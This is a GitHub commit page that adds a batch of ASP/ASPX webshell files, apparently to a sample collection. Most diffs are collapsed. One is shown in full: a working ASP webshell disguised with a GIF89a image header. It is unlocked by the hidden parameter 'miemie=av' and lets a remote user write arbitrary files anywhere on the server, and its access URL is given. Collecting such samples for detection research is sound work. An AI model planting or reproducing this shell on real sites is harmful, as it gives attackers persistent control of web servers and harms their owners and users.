Skip to content

Commit

Permalink
add asp/aspx dama/xiaoma webshell
Browse files Browse the repository at this point in the history
  • Loading branch information
tanjiti committed Nov 5, 2015
1 parent 676c857 commit 6dd904f
Show file tree
Hide file tree
Showing 66 changed files with 55,269 additions and 0 deletions.
615 changes: 615 additions & 0 deletions ASP/dama/36557d6877c0870a36d66a4bc64bafed.asp

Large diffs are not rendered by default.

7 changes: 7 additions & 0 deletions ASP/dama/3a71a7445815bcd7a415e348cc4a8702.asp

Large diffs are not rendered by default.

44 changes: 44 additions & 0 deletions ASP/dama/4685c63b87b72adbbbdad5bc9d1b501b.asp
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
GIF89a$ ;<hTml>
<% if request("miemie")="av" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<style type="text/css">
<!--
#Layer1 {
position:absolute;
left:500px;
top:404px;
width:118px;
height:13px;
z-index:7;
}
.STYLE1 {color: #9900FF}
-->
</style>
<title>Welcome To AK Team</title>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010"
value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
<div id="Layer1">- BY F4ck</div>
</form>
<% end if %>
</hTml>
shell.asp?miemie=av
11 changes: 11 additions & 0 deletions ASP/dama/57d5193f2a9730385df196f43ea733d5.asp

Large diffs are not rendered by default.

23 changes: 23 additions & 0 deletions ASP/dama/60d0e62c4c92bff8584128d4d8bb0bd9.asp

Large diffs are not rendered by default.

Loading

0 comments on commit 6dd904f

Please sign in to comment.